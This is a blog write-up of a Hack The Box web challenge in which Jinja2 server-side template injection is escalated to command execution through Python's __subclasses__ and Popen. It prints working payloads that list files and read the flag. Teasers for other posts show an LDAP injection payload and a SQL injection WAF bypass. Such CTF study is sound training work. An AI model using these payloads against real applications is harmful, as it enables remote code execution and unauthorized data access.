Templated--Hack the Box write up -- Web SSTI

0x00 Problem: 

We open the website, the website shows it powered by flask/Jinja2, it might be SSTI vulnerability.



0x01 Confirm the vulnerability 

We use the payload below to confirm the SSTI, it shows 16 that means this has been executed. No doubt, this is SSTI.  

178.128.40.63:32031/{{4*4}}

0x02 Background 

What is SSTI(server side template injection)?

After the server receives the user's malicious input, it will be treated as part of the content of the Web application template without any processing. During the process of target compilation and rendering, the template engine executes the statement inserted by the user that can destroy the template, which may lead to sensitive information leakage, code execution, GetShell and other problems.


Popular templates for Python:

  • Jinja2
  • django: Django uses its own template engine. We all know that Django is known for fast development, has its own good ORM, and many of its things are very coupling
  • tornado:Tornado emphasizes asynchronous, non-blocking and high concurrency.


Greatly simplified, __mro__ allows us to go back up the tree of inherited objects in the current Python environment, and __subclasses__ lets us come back down. So what's the impact on the search of a greater exploit for SSTI in Flask/Jinja2? By starting with a new-type object, e.g. type str, we can crawl up the inheritance tree to the root object class using __mro__, then crawl back down to every new-style object in the Python environment using __subclasses__. Yes, this gives us access to every class loaded in the current python environment. So, how do we leverage this new found capability?

We can test the hierarchy in the CLI. It shows a lot of buildin functions.




0x03Construct payload



http://178.128.40.63:32031/{{''.__class__.__mro__[1].__subclasses__()}}




0x04 Find the function we can use

Here is a Popen function we may make use. But we don't know the position of this, so we adjust the array number and find it is in 414



http://178.128.40.63:32031/{{''.__class__.__mro__[1].__subclasses__()[414]}} 




Then we try to make use of the function, it shows the files in the current folder. And there is a flag file in it.

http://178.128.40.63:32031{{''.__class__.__mro__[1].__subclasses__()[414]('ls',shell=True,stdout=-1).communicate()[0]}} 

0x05 Get the flag

Then we can get the flag in the flag file

http://178.128.40.63:32031/{{''.__class__.__mro__[1].__subclasses__()[414]('cat%20flag.txt',shell=True,stdout=-1).communicate()[0]}}








Popular posts from this blog

Phonebook - Hack the box Write up -- Web LDAP injection

Image
 0x00 Problem  0x01 Check the vulnerability When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.  We can see that this need us to login with workstation username, it might be LDAP injection. 0x02 LDAP injection payload Here is the basic LDAP injection payload. We can check the vulnerability. user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&))  After we type it, we found the response shows successful, and return a page has search box. Then we type a character in the search box, and it returns some user phonebook information. I tried 'flag', 'HTB', it doesn't find any results. Then we try to find user 'Reese', but the information doesn't look like flag.   0x03 Locate the flag  Then we change our payload to check if the password is the flag. user=Reese password=HTB*)(& --> (&(user=Reese)(password=HTB*)(&  It can also return to the search page which means it...
Read more

wafwaf -- Hack The Box -- Web SQL injection

Image
0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...
Read more

Cheat sheet for security+

Image
Malware virus: need people action to execute and spread. Hoax: trick the victim to infect, like game. worms: spread and execute without humman  trojans: can get remote control. RAT(remote access Trojan) ransomware: take control of your computer system, pay for unlock, most time will not unlock if you pay spyware: audit the callender, website history and other actions. rootkit: a type of backdoor, software design to administrative level control or root priviledge without detection. use DLL injection. malicious code inserted into a running process or kernel-mode device drvier. intercept calls and redirect to the malicous code. spam: CAN-Spam Act law to stop relaying send out email through other's mail server. Spim(instant message) like chat, text message.
Read more